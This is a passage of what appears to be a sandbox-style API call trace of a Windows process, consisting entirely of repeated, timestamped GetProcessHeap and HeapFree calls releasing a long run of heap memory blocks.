lpMem=0x5062f8 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506308 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506318 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506328 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506338 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506348 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506358 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506368 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506378 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506388 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506398 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5063a8 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5063b8 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5063c8 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5063d8 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5063e8 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5063f8 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506408 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506418 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506428 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506438 | out: hHeap=0x4f0000) returned 1 [0159.043] GetProcessHeap () returned 0x4f0000 [0159.043] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506448 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506458 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506468 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506478 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506488 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506498 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5064a8 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5064b8 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5064c8 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5064d8 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5064e8 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5064f8 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506508 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506518 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506528 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506538 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.044] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506548 | out: hHeap=0x4f0000) returned 1 [0159.044] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506558 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506568 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506578 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5065a8 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5065b8 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5065c8 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5065d8 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5065e8 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5065f8 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506608 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506618 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506628 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506638 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506648 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506658 | out: hHeap=0x4f0000) returned 1 [0159.045] GetProcessHeap () returned 0x4f0000 [0159.045] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506668 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506678 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506688 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506698 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5066a8 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5066b8 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5066c8 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5066d8 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5066e8 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5066f8 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506708 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506718 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506728 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506738 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506748 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506758 | out: hHeap=0x4f0000) returned 1 [0159.046] GetProcessHeap () returned 0x4f0000 [0159.046] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506768 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506778 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506788 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506798 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5067a8 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5067b8 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5067c8 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5067d8 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5067e8 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5067f8 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506808 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506818 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506828 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506838 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506848 | out: hHeap=0x4f0000) returned 1 [0159.047] GetProcessHeap () returned 0x4f0000 [0159.047] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506858 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506868 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506878 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506888 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506898 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5068a8 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5068b8 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5068c8 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5068d8 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5068e8 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5068f8 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506908 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506918 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506928 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506938 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506948 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.048] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506958 | out: hHeap=0x4f0000) returned 1 [0159.048] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506968 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506978 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5069a8 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5069b8 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5069c8 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5069d8 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5069e8 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5069f8 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a08 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a18 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a28 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a38 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a48 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a58 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a68 | out: hHeap=0x4f0000) returned 1 [0159.049] GetProcessHeap () returned 0x4f0000 [0159.049] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a78 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a88 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506a98 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506aa8 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ab8 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ac8 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ad8 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae8 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506af8 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b08 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b18 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b28 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b38 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b48 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b58 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b68 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b78 | out: hHeap=0x4f0000) returned 1 [0159.050] GetProcessHeap () returned 0x4f0000 [0159.050] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b88 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506b98 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ba8 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506bb8 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506bc8 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506bd8 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506be8 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506bf8 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c08 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c18 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c28 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c38 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c48 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c58 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c68 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c78 | out: hHeap=0x4f0000) returned 1 [0159.051] GetProcessHeap () returned 0x4f0000 [0159.051] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c88 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506c98 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ca8 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506cb8 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506cc8 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506cd8 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ce8 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506cf8 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506d08 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506d18 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506d28 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506d38 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506d48 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506d58 | out: hHeap=0x4f0000) returned 1 [0159.052] GetProcessHeap () returned 0x4f0000 [0159.052] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506d68 